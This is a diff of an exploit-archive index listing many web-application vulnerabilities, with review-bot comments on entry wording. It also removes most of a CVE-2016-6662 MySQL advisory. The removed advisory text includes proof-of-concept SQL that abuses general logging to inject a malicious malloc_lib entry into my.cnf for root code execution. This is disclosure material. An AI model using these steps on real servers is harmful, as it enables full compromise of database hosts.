-27671,platforms/php/webapps/27671.txt,"LinPHA 1.1 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-18,d4igoro,php,webapps,0
 27672,platforms/cgi/webapps/27672.txt,"axoverzicht.CGI - Cross-Site Scripting",2006-04-18,Qex,cgi,webapps,0
 27673,platforms/php/webapps/27673.txt,"PHPLinks 2.1.2/2.1.3 - 'index.php' Cross-Site Scripting",2006-04-18,r0t,php,webapps,0
 27674,platforms/php/webapps/27674.txt,"RechnungsZentrale 2 1.1.3 - Authent.php4 SQL Injection",2006-04-18,"GroundZero Security",php,webapps,0
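Review bot: Rows 27193 and 27194 now read `'install.php' Parameter` and `'sec_stage_install.php' Parameter`, which labels the script file as the parameter; the old text named the actual vulnerable parameter, `language`, and the rewrite drops it. Keep the parameter name in the form the rest of this commit uses, e.g. `"LinPHA 0.9.x/1.0 - 'install.php' language Parameter Local File Inclusion"` and the same for 27194 with `sec_stage_install.php`. Row 27195 loses both `language` and the `POST Method` qualifier, so the three install-stage entries are no longer distinguishable by anything but file name; the sibling 27192 shows the intended shape (`'lang' Parameter`) and these should match it.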
@@ -30006,7 +30005,6 @@ id,file,description,date,author,platform,type,port
 28963,platforms/php/webapps/28963.txt,"Bitweaver 1.x - fisheye/index.php sort_mode Parameter SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0
 28964,platforms/php/webapps/28964.txt,"Bitweaver 1.x - wiki/orphan_pages.php sort_mode Parameter SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0
 28965,platforms/php/webapps/28965.txt,"Bitweaver 1.x - wiki/list_pages.php sort_mode Parameter SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0
-28966,platforms/php/webapps/28966.txt,"Drake CMS 0.2 - 'index.php' Cross-Site Scripting",2006-11-10,CorryL,php,webapps,0
 28967,platforms/php/webapps/28967.txt,"ExoPHPDesk 1.2 - Pipe.php Remote File Inclusion",2006-11-11,Firewall1954,php,webapps,0
 28970,platforms/php/webapps/28970.txt,"WordPress Plugin Dexs PM System - Authenticated Persistent Cross-Site Scripting",2013-10-15,TheXero,php,webapps,80
 28971,platforms/php/webapps/28971.py,"Dolibarr ERP/CMS 3.4.0 - (exportcsv.php sondage Parameter) SQL Injection",2013-10-15,drone,php,webapps,80
@@ -30391,7 +30389,6 @@ id,file,description,date,author,platform,type,port
 29491,platforms/php/webapps/29491.txt,"MyBloggie 2.1.5 - 'index.php' PATH_INFO Parameter Cross-Site Scripting",2007-01-17,CorryL,php,webapps,0
 40368,platforms/cgi/webapps/40368.sh,"Inteno EG101R1 VoIP Router - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80
 29492,platforms/php/webapps/29492.txt,"MyBloggie 2.1.5 - 'login.php' PATH_INFO Parameter Cross-Site Scripting",2007-01-17,CorryL,php,webapps,0
-29495,platforms/php/webapps/29495.txt,"Sabros.US 1.7 - 'index.php' Cross-Site Scripting",2007-01-18,CorryL,php,webapps,0
 29497,platforms/php/webapps/29497.txt,"Easebay Resources Paypal Subscription - Manager Multiple Input Validation Vulnerabilities",2007-01-20,Doz,php,webapps,0
 29498,platforms/php/webapps/29498.txt,"Easebay Resources Login Manager - Multiple Input Validation Vulnerabilities",2007-01-20,Doz,php,webapps,0
 29499,platforms/php/webapps/29499.txt,"SMF 1.1 - 'index.php' HTML Injection",2007-01-20,"Aria-Security Team",php,webapps,0
@@ -30664,7 +30661,7 @@ id,file,description,date,author,platform,type,port
 29796,platforms/hardware/webapps/29796.pl,"Pirelli Discus DRG A125g - Remote Change WiFi Password",2013-11-24,"Sebastián Magof",hardware,webapps,0
 29797,platforms/php/webapps/29797.txt,"MyBB Ajaxfs 2 Plugin - SQL Injection",2013-11-24,"IeDb ir",php,webapps,0
 29802,platforms/hardware/webapps/29802.txt,"TP-Link WR740N/WR740ND - Multiple Cross-Site Request Forgery Vulnerabilities",2013-11-25,"Samandeep Singh",hardware,webapps,0
-29805,platforms/php/webapps/29805.txt,"Drake CMS 0.3.7 - 404.php Local File Inclusion",2007-03-30,"HACKERS PAL",php,webapps,0
+29805,platforms/php/webapps/29805.txt,"Drake CMS 0.3.7 - '404.php' Local File Inclusion",2007-03-30,"HACKERS PAL",php,webapps,0
 29806,platforms/php/webapps/29806.pl,"PHP-Fusion 6.1.5 - Calendar_Panel Module Show_Event.php SQL Injection",2007-03-31,UNIQUE-KEY,php,webapps,0
 29817,platforms/asp/webapps/29817.txt,"Gazi Okul Sitesi 2007 - Fotokategori.asp SQL Injection",2007-04-04,CoNqUeRoR,asp,webapps,0
 29821,platforms/php/webapps/29821.txt,"Livor 2.5 - 'index.php' Cross-Site Scripting",2007-04-06,"Arham Muhammad",php,webapps,0
@@ -31347,7 +31344,6 @@ id,file,description,date,author,platform,type,port
 31055,platforms/asp/webapps/31055.txt,"Multiple Web Wiz Products - Remote Information Disclosure",2008-01-23,AmnPardaz,asp,webapps,0
 31058,platforms/asp/webapps/31058.txt,"Pre Hotel and Resorts - 'user_login.asp' Multiple SQL Injection Vulnerabilities",2008-01-25,milad_sa2007,asp,webapps,0
 31059,platforms/asp/webapps/31059.txt,"E-Smart Cart - 'Members Login' Multiple SQL Injection Vulnerabilities",2008-01-25,milad_sa2007,asp,webapps,0
-31060,platforms/php/webapps/31060.txt,"Drake CMS 0.4.9 - 'index.php' Cross-Site Scripting",2008-01-25,"Omer Singer",php,webapps,0
 31061,platforms/php/webapps/31061.txt,"Trixbox 2.4.2 - user/index.php Query String Cross-Site Scripting",2008-01-25,"Omer Singer",php,webapps,0
 31062,platforms/php/webapps/31062.txt,"Trixbox 2.4.2 - maint/index.php Query String Cross-Site Scripting",2008-01-25,"Omer Singer",php,webapps,0
 31063,platforms/php/webapps/31063.txt,"WebCalendar 1.1.6 - pref.php Query String Cross-Site Scripting",2008-01-25,"Omer Singer",php,webapps,0
@@ -31756,7 +31752,6 @@ id,file,description,date,author,platform,type,port
 31653,platforms/php/webapps/31653.txt,"amfPHP 1.2 - browser/details class Parameter Cross-Site Scripting",2008-04-15,"Alberto Cuesta Partida",php,webapps,0
 31654,platforms/php/webapps/31654.txt,"W2B Online Banking - 'ilang' Parameter Remote File Inclusion",2008-04-15,THuM4N,php,webapps,0
 31655,platforms/php/webapps/31655.txt,"Istant-Replay - 'read.php' Remote File Inclusion",2008-04-15,THuGM4N,php,webapps,0
-31657,platforms/php/webapps/31657.txt,"Blogator-script 0.95 - 'bs_auth.php' Cross-Site Scripting",2008-04-16,ZoRLu,php,webapps,0
 31658,platforms/php/webapps/31658.txt,"MyBoard 1.0.12 - 'rep.php' Cross-Site Scripting",2008-04-17,ZoRLu,php,webapps,0
 31659,platforms/php/webapps/31659.txt,"PHP-Stats 0.1.9.1 - 'admin.php' Multiple Cross-Site Scripting Vulnerabilities",2008-04-17,ZoRLu,php,webapps,0
 31660,platforms/php/webapps/31660.txt,"EsContacts 1.0 - add_groupe.php msg Parameter Cross-Site Scripting",2008-04-17,ZoRLu,php,webapps,0
@@ -31765,7 +31760,7 @@ id,file,description,date,author,platform,type,port
 31663,platforms/php/webapps/31663.txt,"EsContacts 1.0 - importer.php msg Parameter Cross-Site Scripting",2008-04-17,ZoRLu,php,webapps,0
 31664,platforms/php/webapps/31664.txt,"EsContacts 1.0 - 'login.php' msg Parameter Cross-Site Scripting",2008-04-17,ZoRLu,php,webapps,0
 31665,platforms/php/webapps/31665.txt,"EsContacts 1.0 - search.php msg Parameter Cross-Site Scripting",2008-04-17,ZoRLu,php,webapps,0
-31666,platforms/asp/webapps/31666.txt,"CoBaLT 2.0 - 'adminler.asp' SQL Injection",2008-04-17,U238,asp,webapps,0
+31666,platforms/asp/webapps/31666.txt,"Cobalt 2.0 - 'adminler.asp' SQL Injection",2008-04-17,U238,asp,webapps,0
 31668,platforms/php/webapps/31668.txt,"TLM CMS 3.1 - Multiple SQL Injections",2008-04-18,ZoRLu,php,webapps,0
 31669,platforms/php/webapps/31669.txt,"Wikepage Opus 13 2007.2 - 'wiki' Parameter Cross-Site Scripting",2008-04-18,"Gerendi Sandor Attila",php,webapps,0
 31670,platforms/php/webapps/31670.txt,"WordPress 2.3.3 - 'cat' Parameter Directory Traversal",2008-04-18,"Gerendi Sandor Attila",php,webapps,0
@@ -32060,7 +32055,6 @@ id,file,description,date,author,platform,type,port
 32100,platforms/php/webapps/32100.txt,"RunCMS 1.6.1 - config.php bbPath[root_theme] Parameter Remote File Inclusion",2008-07-21,Ciph3r,php,webapps,0
 32101,platforms/php/webapps/32101.txt,"eSyndiCat 1.6 - 'admin_lng' Cookie Parameter Authentication Bypass",2008-07-21,Ciph3r,php,webapps,0
 32102,platforms/php/webapps/32102.txt,"AlphAdmin CMS 1.0.5_03 - 'aa_login' Cookie Parameter Authentication Bypass",2008-07-21,Ciph3r,php,webapps,0
-32103,platforms/php/webapps/32103.txt,"VisualPic 0.3.1 - Cross-Site Scripting",2008-07-21,Ciph3r,php,webapps,0
 32106,platforms/php/webapps/32106.txt,"Claroline 1.8 - learnPath/calendar/myagenda.php Query String Cross-Site Scripting",2008-07-22,DSecRG,php,webapps,0
 32107,platforms/php/webapps/32107.txt,"Claroline 1.8 - user/user.php Query String Cross-Site Scripting",2008-07-22,DSecRG,php,webapps,0
 32108,platforms/php/webapps/32108.txt,"Claroline 1.8 - tracking/courseLog.php view Parameter Cross-Site Scripting",2008-07-22,DSecRG,php,webapps,0
@@ -32528,8 +32522,6 @@ id,file,description,date,author,platform,type,port
 32897,platforms/java/webapps/32897.txt,"Cisco Subscriber Edge Services Manager - Cross-Site Scripting / HTML Injection",2009-04-09,"Usman Saeed",java,webapps,0
 32898,platforms/asp/webapps/32898.txt,"XIGLA Absolute Form Processor XE 1.5 - 'login.asp' SQL Injection",2009-04-09,"ThE g0bL!N",asp,webapps,0
 32903,platforms/asp/webapps/32903.txt,"People-Trak - Login SQL Injection",2009-04-13,Mormoroth.net,asp,webapps,0
-32905,platforms/php/webapps/32905.txt,"LinPHA 1.3.2/1.3.3 - 'login.php' Cross-Site Scripting",2009-04-09,"Gerendi Sandor Attila",php,webapps,0
-32906,platforms/php/webapps/32906.txt,"LinPHA 1.3.2/1.3.3 - new_images.php Cross-Site Scripting",2009-04-09,"Gerendi Sandor Attila",php,webapps,0
 32907,platforms/cgi/webapps/32907.txt,"Banshee 1.4.2 DAAP Extension - 'apps/web/vs_diag.cgi' Cross-Site Scripting",2009-04-13,"Anthony de Almeida Lopes",cgi,webapps,0
 32908,platforms/multiple/webapps/32908.txt,"IBM Tivoli Continuous Data Protection for Files 3.1.4.0 - Cross-Site Scripting",2009-04-14,"Abdul-Aziz Hariri",multiple,webapps,0
 32909,platforms/java/webapps/32909.txt,"Novell Teaming 1.0 - User Enumeration Weakness / Multiple Cross-Site Scripting Vulnerabilities",2009-04-15,"Michael Kirchner",java,webapps,0
@@ -33145,7 +33137,6 @@ id,file,description,date,author,platform,type,port
 34095,platforms/php/webapps/34095.txt,"PonVFTP - 'login.php' SQL Injection",2010-01-15,S2K9,php,webapps,0
 34096,platforms/php/webapps/34096.txt,"CuteSITE CMS 1.x - manage/add_user.php user_id Parameter SQL Injection",2010-06-06,"High-Tech Bridge SA",php,webapps,0
 34097,platforms/php/webapps/34097.txt,"CuteSITE CMS 1.x - manage/main.php fld_path Parameter Cross-Site Scripting",2010-06-06,"High-Tech Bridge SA",php,webapps,0
-34154,platforms/php/webapps/34154.txt,"Software Index - 'signinform.php' Cross-Site Scripting",2010-06-27,indoushka,php,webapps,0
 34155,platforms/php/webapps/34155.txt,"Ceica-GW - 'login.php' Cross-Site Scripting",2010-06-27,indoushka,php,webapps,0
 34157,platforms/php/webapps/34157.txt,"Firebook - Multiple Cross-Site Scripting / Directory Traversal Vulnerabilities",2010-06-17,MustLive,php,webapps,0
 34116,platforms/php/webapps/34116.txt,"Bits Video Script 2.05 Gold Beta - showcasesearch.php rowptem[template] Parameter Remote File Inclusion",2010-01-18,indoushka,php,webapps,0
@@ -36262,7 +36253,7 @@ id,file,description,date,author,platform,type,port
 39269,platforms/php/webapps/39269.txt,"WordPress Plugin Lead Octopus Power - 'id' Parameter SQL Injection",2014-07-28,Amirh03in,php,webapps,0
 39270,platforms/php/webapps/39270.txt,"WordPress Plugin WhyDoWork AdSense - options-general.php Cross-Site Request Forgery (Option Manipulation)",2014-07-28,"Dylan Irzi",php,webapps,0
 39271,platforms/php/webapps/39271.txt,"CMSimple - Default Administrator Credentials",2014-07-28,"Govind Singh",php,webapps,0
-39272,platforms/php/webapps/39272.txt,"CMSimple 4.4.4 - Remote file Inclusion",2014-07-28,"Govind Singh",php,webapps,0
+39272,platforms/php/webapps/39272.txt,"CMSimple 4.4.4 - Remote File Inclusion",2014-07-28,"Govind Singh",php,webapps,0
 39273,platforms/php/webapps/39273.txt,"CMSimple - /2author/index.php color Parameter Remote Code Execution",2014-07-28,"Govind Singh",php,webapps,0
 39279,platforms/php/webapps/39279.txt,"WordPress Plugin wpSS - 'ss_handler.php' SQL Injection",2014-08-06,"Ashiyane Digital Security Team",php,webapps,0
 39280,platforms/php/webapps/39280.txt,"WordPress Plugin HDW Player - 'wp-admin/admin.php' SQL Injection",2014-05-28,"Anant Shrivastava",php,webapps,0
@@ -36784,3 +36775,5 @@ id,file,description,date,author,platform,type,port
 40753,platforms/php/webapps/40753.php,"Schoolhos CMS 2.29 - Remote Code Execution / SQL Injection",2016-11-13,0x4148,php,webapps,0
 40755,platforms/php/webapps/40755.html,"ATutor 2.2.2 - Cross-Site Request Forgery (Add New Course)",2016-11-13,"Saravana Kumar",php,webapps,0
 40756,platforms/php/webapps/40756.py,"Boonex Dolphin 7.3.2 - Authentication Bypass / Remote Code Execution",2016-11-14,0x4148,php,webapps,0
+40771,platforms/php/webapps/40771.txt,"Wordpress Plugin Answer My Question 1.3 - SQL Injection",2016-11-17,"Lenon Leite",php,webapps,0
+40772,platforms/php/webapps/40772.txt,"Wordpress Plugin Sirv 1.3.1 - SQL Injection",2016-11-17,"Lenon Leite",php,webapps,0
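Review bot: The two rows added in the last hunk (40771, 40772) spell the product `Wordpress Plugin`, while the file's established form is `WordPress Plugin` (39269, 39279, 39280 in the hunk just above, and 28970 earlier in this diff); a case-sensitive search or filter on the canonical spelling will miss the new entries. Suggest `"WordPress Plugin Answer My Question 1.3 - SQL Injection"` and `"WordPress Plugin Sirv 1.3.1 - SQL Injection"`, which also matches the capitalisation fix this same commit makes elsewhere (e.g. `Cobalt`, `Sabros.us`).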
diff --git a/platforms/asp/webapps/16178.txt b/platforms/asp/webapps/16178.txt index edad23e8c..d560430b3 100755 --- a/platforms/asp/webapps/16178.txt +++ b/platforms/asp/webapps/16178.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45211/discuss +source: http://www.securityfocus.com/bid/45211/info Real Estate Single is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/platforms/asp/webapps/16179.txt b/platforms/asp/webapps/16179.txt index 627979b7b..eb0a65239 100755 --- a/platforms/asp/webapps/16179.txt +++ b/platforms/asp/webapps/16179.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45212/discuss +source: http://www.securityfocus.com/bid/45212/info Multi Agent System is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/platforms/linux/local/40360.txt b/platforms/linux/local/40360.txt index e49350d5b..1aa59e7be 100755 --- a/platforms/linux/local/40360.txt +++ b/platforms/linux/local/40360.txt 
@@ -1,555 +1,18 @@ - - -============================================= -- Discovered by: Dawid Golunski -- http://legalhackers.com -- dawid (at) legalhackers.com - -- CVE-2016-6662 -- Release date: 12.09.2016 -- Last updated: 23.09.2016 -- Revision: 3 -- Severity: Critical -============================================= - - -I. VULNERABILITY -------------------------- - -MySQL <= 5.7.14 Remote Root Code Execution / Privilege Escalation (0day) - 5.6.32 - 5.5.51 - -MySQL clones are also affected, including: - -MariaDB -PerconaDB - - -II. BACKGROUND -------------------------- - -"MySQL is the world's most popular open source database. -Whether you are a fast growing web property, technology ISV or large -enterprise, MySQL can cost-effectively help you deliver high performance, -scalable database applications." - -"Many of the world's largest and fastest-growing organizations including -Facebook, Google, Adobe, Alcatel Lucent and Zappos rely on MySQL to save time -and money powering their high-volume Web sites, business-critical systems and -packaged software." - -http://www.mysql.com/products/ -http://www.mysql.com/why-mysql/ -http://db-engines.com/en/system/MySQL - - -III. INTRODUCTION -------------------------- - -An independent research has revealed multiple severe MySQL vulnerabilities. -This advisory focuses on a critical vulnerability with a CVEID of CVE-2016-6662 -which can allow attackers to (remotely) inject malicious settings into MySQL -configuration files (my.cnf) leading to critical consequences. - -The vulnerability affects all MySQL servers in default configuration in all -version branches (5.7, 5.6, and 5.5) including the latest versions, and could -be exploited by both local and remote attackers. -Both the authenticated access to MySQL database (via network connection or web -interfaces such as phpMyAdmin) and SQL Injection could be used as exploitation -vectors. 
- -As SQL Injection attacks are one of the most common issues in web applications, -the CVE-2016-6662 vulnerabilty could put web applications at a critical risk in -case of a successful SQL Injection attack. - -A successful exploitation could allow attackers to execute arbitrary code with -root privileges which would then allow them to fully compromise the server on -which an affected version of MySQL is running. - -The vulnerability can be exploited even if security modules SELinux and AppArmor -are installed with default active policies for MySQL service on major Linux -distributions. - -This advisory provides a Proof-Of-Concept MySQL exploit which demonstrates how -Remote Root Code Execution could be achieved by attackers. - - -IV. DESCRIPTION -------------------------- - -The default MySQL package comes with a mysqld_safe script which is used by many -default installations/packages of MySQL as a wrapper to start the MySQL service -process which can observed, for example, in case of the following fully-updated -Debian system: - -root@debian:~# lsb_release -a -No LSB modules are available. -Distributor ID: Debian -Description: Debian GNU/Linux 8.5 (jessie) -Release: 8.5 -Codename: jessie - -root@debian:~# dpkg -l | grep -i mysql-server -ii mysql-server 5.5.50-0+deb8u1 -ii mysql-server-5.5 5.5.50-0+deb8u1 -ii mysql-server-core-5.5 5.5.50-0+deb8u1 - -After starting MySQL (installed from packages provided in the default Debian repositories) by running - -root@debian:~# service mysql start - -or, alternatively: - -root@debian:~# /etc/init.d/mysql start - -The MySQL server process tree looks as follows: - -root 14967 0.0 0.1 4340 1588 ? S 06:41 0:00 /bin/sh /usr/bin/mysqld_safe - -mysql 15314 1.2 4.7 558160 47736 ? 
Sl 06:41 0:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib/mysql/plugin --user=mysql --log-error=/var/log/mysql/error.log --pid-file=/var/run/mysqld/mysqld.pid --socket=/var/run/mysqld/mysqld.sock --port=3306 - - -As can be seen, the mysqld_safe wrapper script is executed as root, whereas the -main mysqld process drops its privileges to mysql user. - - -The wrapper script has the following function : - -----[ /usr/bin/mysqld_safe ]---- - -[...] - -# set_malloc_lib LIB -# - If LIB is empty, do nothing and return -# - If LIB is 'tcmalloc', look for tcmalloc shared library in /usr/lib -# then pkglibdir. tcmalloc is part of the Google perftools project. -# - If LIB is an absolute path, assume it is a malloc shared library -# -# Put LIB in mysqld_ld_preload, which will be added to LD_PRELOAD when -# running mysqld. See ld.so for details. -set_malloc_lib() { - malloc_lib="$1" - - if [ "$malloc_lib" = tcmalloc ]; then - pkglibdir=`get_mysql_config --variable=pkglibdir` - malloc_lib= - # This list is kept intentionally simple. Simply set --malloc-lib - # to a full path if another location is desired. - for libdir in /usr/lib "$pkglibdir" "$pkglibdir/mysql"; do - for flavor in _minimal '' _and_profiler _debug; do - tmp="$libdir/libtcmalloc$flavor.so" - #log_notice "DEBUG: Checking for malloc lib '$tmp'" - [ -r "$tmp" ] || continue - malloc_lib="$tmp" - break 2 - done - done - -[...] - -----------[ eof ]--------------- - - -which can be used to preload a shared library before starting the server. - -The library can be set with the following parameter: - ---malloc-lib=LIB - -This parameter can also be specified within a mysql config file (my.cnf) -in a '[mysqld]' or '[mysqld_safe]' section. - -If an attacker managed to inject a path to their malicious library within the -config, they would be able to preload an arbitrary library and thus execute -arbitrary code with root privileges when MySQL service is restarted. 
-The restart could be triggered manually, via a system update, package update -(including an update of dependencies), system reboot etc.). -Attackers might also be able to speed up the server restart remotely by issuing -a SHUTDOWN SQL statement or 'shutdown' command via mysqladmin. - -In 2003 a vulnerability was disclosed in MySQL versions before 3.23.55 that -allowed users to create mysql config files with a simple statement: - -SELECT * INTO OUTFILE '/var/lib/mysql/my.cnf' - -The issue was fixed by refusing to load config files with world-writable -permissions as these are the default permissions applied to files created -by OUTFILE query. -As an additional protection, OUTFILE/DUMPFILE statements are prohibited from -overwrite existing files. -This protects existing configuration files. -The old vulnerability has been considered fixed ever since the MySQL 3.23.55 -was released in 2003, and writing to configuration files has been considered -impossible. - -However, the V. PROOF OF CONCEPT section below will show that it is possible to -successfully bypass current restrictions by abusing MySQL logging functions -(available in every MySQL install by default) to achieve the following: - -1) Inject malicious configuration into existing MySQL configuration files on -systems with weak/improper permissions (configs owned by/writable by mysql user) -(SCENARIO 1). - -2) Create new configuration files within a MySQL data directory (writable -by MySQL by default) on _default_ MySQL installs without the need to rely on -improper config permissions (SCENARIO 2). - -3) Attackers with only SELECT/FILE permissions can gain access to logging -functions (normally only available to MySQL admin users) on all of the -_default_ MySQL installations and thus be in position to add/modify MySQL -config files. 
- - -Update (16/09/2016): -The proof of concept details below should be read closely as there have been -some misconceptions noticed on some security forums which incorrectly try -to lessen the severity of this vulnerability due to a lack of correct -understanding of the issues presented in this advisory. -It should be noted that: - -* SCENARIO 2 (point 2 above) is _independent_ of SCENARIO 1 (point 1 above). -I.e the config injection vulnerability which ultimately leads to loading -arbitrary malicious shared libraries CAN be exploited EVEN if there are NO -my.cnf config files with insecure permissions available on the system. -In other words, weak permissions are NOT a requirement for exploitation, and -the vulnerability CAN be exploit on affected DEFAULT PerconaDB/MariaDB/MySQL -installations with CORRECT permissions set on ALL my.cnf files available on -the system by default. -The SCENARIO 1 has only been presented as it makes the exploit code much -simpler and allows to explain the logging abuse/config injection vulnerability -without exposing default installations (SCENARIO 2) to an immediate risk. - -* The researcher has created a private working PoC that has not been shared -publicly which CAN successfully exploit SCENARIO 2 (default setup/no incorrect -permissions on any of the default my.cnf config files). As noted both in the -section below as well as in the current PoC exploit's comments, the current -PoC is limited. It has been purposefully limited to protect immediate -exploitation of default installations (no incorrect perms on my.cnf) and give -users time to react to the vulnerability. - -* A successful exploitation of SCENARIO 2 (no my.cnf available with weak perms) -leading to root privilege escalation/code execution can _ALSO_ (however is NOT a -requirement) be achieved by means of a (separate) vulnerability: CVE-2016-6663. -PoC has been created by the author of this advisory but not released publicly. 
- -* The logging facility CAN be accessed by standard users with SELECT/FILE -privileges only. I.e SUPER privilege is NOT required to create malicious triggers -which contain the malicious payload that grants the attacker access to the -logging facility DESPITE the LACK of administrative privileges. -This has been explained in the section below (see point 3 in the section below) -and proven in the current PoC in this advisory and can also be observed in the -replication steps (see VI. section) that show the attacker database account -permissions (the attacker DB account is NOT assigned SUPER permissions). - -* The exploitation requires a restart that could happen via a number of ways. -Attackers might also be able to speed up the server restart remotely by issuing -a SHUTDOWN SQL statement or 'shutdown' command via mysqladmin. - - -V. PROOF OF CONCEPT -------------------------- - - -1) Inject malicious configuration into existing MySQL configuration files on -systems with weak/improper permissions (configs owned by/writable by mysql user). -(SCENARIO 1) -~~~~~~~~~~~~~~~~~~~~~~~~~ - -MySQL configuration files are loaded from all supported locations and processed -one by one when mysqld_safe script is executed. - -Exact config locations depend on MySQL version. -For example, as described on: -http://dev.mysql.com/doc/refman/5.5/en/option-files.html -for MySQL 5.5 the config locations include: - -/etc/my.cnf Global options -/etc/mysql/my.cnf Global options -SYSCONFDIR/my.cnf Global options -$MYSQL_HOME/my.cnf Server-specific options -defaults-extra-file The file specified with --defaults-extra-file=file_name, if any -~/.my.cnf User-specific options - -There is a common misconception that mysql config files should be owned by mysql -user for the server to work properly. -Many installation guides, or even security guides often wrongly advise users -to set the ownership of mysql config files/directories such as /etc/mysql -or /etc/my.cnf to mysql user. 
- -For example: -https://github.com/willfong/mariadb-backup/blob/master/README.md -says: - -"Lock down permissions on config file(s) - -chown mysql /etc/my.cnf -chmod 600 /etc/my.cnf" - -Whereas the article at: -http://www.devshed.com/c/a/mysql/security-issues-with-mysql/ -mentions: - -"You should also protect the global option file, /etc/my.cnf, if it exists. -The mysql user should own it and have read/write access to it, but other users -need only read access: - -shell> chown mysql /etc/my.cnf" - -Moreover, there are also MySQL recipes for installation automation software -such as Chef that also provide users with vulnerable permissions on my.cnf -config files. - -If any of the MySQL config files is owned by mysql user, an attacker could -append malicious config entries to it as follows: - -root@debian:~/# ls -l /etc/my.cnf --rw-r--r-- 1 mysql mysql 72 Jul 28 17:20 /etc/my.cnf - -root@debian:~/# cat /etc/my.cnf - -[mysqld] - -key_buffer = 16M -max_allowed_packet = 16M - - -Attacker could run the following SQL queries: - -mysql> set global general_log_file = '/etc/my.cnf'; -mysql> set global general_log = on; -mysql> select ' - '> - '> ; injected config entry - '> - '> [mysqld] - '> malloc_lib=/tmp/mysql_exploit_lib.so - '> - '> [separator] - '> - '> '; -1 row in set (0.00 sec) -mysql> set global general_log = off; - -The resulting config would then have the following part appended: - -root@debian:~/# cat /etc/my.cnf - -[mysqld] - -key_buffer = 16M -max_allowed_packet = 16M - -/usr/sbin/mysqld, Version: 5.5.50-0+deb8u1 ((Debian)). started with: -Tcp port: 3306 Unix socket: /var/run/mysqld/mysqld.sock -Time Id Command Argument -160728 17:25:14 40 Query select ' - -; injected config entry - -[mysqld] -malloc_lib=/tmp/mysql_exploit_lib.so - -[separator] - -' -160728 17:25:15 40 Query set global general_log = off - - -This config contains some redundant information that would normally cause MySQL -to fail to startup during a restart due to parsing issues. 
- -However, the important part is that the config now contains the section: - -[mysqld] -malloc_lib=/tmp/mysql_exploit_lib.so - -mysqld_safe will read the shared library path correctly and add it to -the LD_PRELOAD environment variable before the startup of mysqld daemon. -The preloaded library can then hook the libc fopen() calls and clean up -the config before it is ever processed by mysqld daemon in order for it -to start up successfully so that the compromise goes unnoticed by the -system administrators etc. - - - -~~~~~~~~~~~~~~~~~~~~~~~~~ -2) Create new configuration files within a MySQL data directory (writable -by MySQL by default) on _default_ MySQL installs without the need to rely on -improper config permissions. -(SCENARIO 2) - - -Analysis of the mysqld_safe script has shown that in addition to the -config locations provided above, mysqld_safe also loads the configuration file -from the mysql data directory (/var/lib/mysql/my.cnf) by default as can be -seen below: - -----[ /usr/bin/mysqld_safe ]---- - -[...] -# Try where the binary installs put it -if test -d $MY_BASEDIR_VERSION/data/mysql -then - DATADIR=$MY_BASEDIR_VERSION/data - if test -z "$defaults" -a -r "$DATADIR/my.cnf" - then - defaults="--defaults-extra-file=$DATADIR/my.cnf" - fi -[...] - -----------[ eof ]--------------- - -on MySQL versions in branches 5.5 and 5.6. 
-The datadir location for my.cnf has only been removed from MySQL starting -from 5.7 branch however in many configurations it will still load config -from: - -/var/lib/mysql/.my.cnf - -The data directory /var/lib/mysql is (obviously) writable by mysql user on -every install: - -root@debian:~# ls -ld /var/lib/mysql/ -drwx------ 4 mysql mysql 4096 Jul 28 06:41 /var/lib/mysql/ - -Therefore, if no mysql-owned configs are available on the system, an attacker -could still be able to exploit the vulnerability by creating a config at the -following locations: - -/var/lib/mysql/my.cnf -/var/lib/mysql/.my.cnf - -As mentioned, using FILE permission to create such a file with the SQL statement: - -SELECT 'malicious config entry' INTO OUTFILE '/var/lib/mysql/my.cnf' - -would not work, as MySQL creates files with rw permissions for the world: - --rw-rw-rw- 1 mysql mysql 4 Jul 28 07:46 /var/lib/mysql/my.cnf - -and MySQL would prevent such world-writable config from being loaded at startup. - -Attackers could bypass this however by using these logging SQL statements: - -mysql> set global general_log_file = '/var/lib/mysql/my.cnf'; -mysql> set global general_log = on; -mysql> select ' - '> - '> ; injected config entry - '> - '> [mysqld] - '> malloc_lib=/var/lib/mysql/mysql_hookandroot_lib.so - '> - '> [separator] - '> - '> '; -1 row in set (0.00 sec) -mysql> set global general_log = off; - -The queries will create the my.cnf file with the necessary permissions -(without o-w bit) for it to be parsed by the MySQL daemon: - -# ls -l /var/lib/mysql/my.cnf --rw-rw---- 1 mysql mysql 352 Jul 28 17:48 /var/lib/mysql/my.cnf - -The file will have the following contents: - -# cat /var/lib/mysql/my.cnf -/usr/sbin/mysqld, Version: 5.5.50-0+deb8u1 ((Debian)). 
started with: -Tcp port: 3306 Unix socket: /var/run/mysqld/mysqld.sock -Time Id Command Argument -160728 17:48:22 43 Query select ' - -; injected config entry - -[mysqld] -malloc_lib=/var/lib/mysql/mysql_hookandroot_lib.so - -[separator] - -' -160728 17:48:23 43 Query set global general_log = off - - -One problem will remain however. MySQL will refuse files that do not start with -a valid [section] header with the message: - -error: Found option without preceding group in config file: /var/lib/mysql/my.cnf at line: 1 -Fatal error in defaults handling. Program aborted - -Further testing has however proven that IT IS possible to bypass this security -restriction as well but this will not be included in this advisory/PoC for the -time being. - -It is worth to note that attackers could use one of the other vulnerabilities -discovered by the author of this advisory which has been assigned a CVEID of -CVE-2016-6663 and is pending disclosure. -The undisclosed vulnerability makes it easy for certain attackers to create -/var/lib/mysql/my.cnf file with arbitrary contents without the FILE privilege -requirement. - - - - -~~~~~~~~~~~~~~~~~~~~~~~~~ -3) Attackers with only SELECT/FILE permissions can gain access to logging functions -(normally only available to MySQL admin users) on all of the _default_ MySQL -installations and thus be in position to add/modify MySQL config files. - - -If attackers do not have administrative rights required to access logging settings -and only have standard user privileges with the addition of FILE privilege then -they could still gain the ability to write to / modify configuration files. 
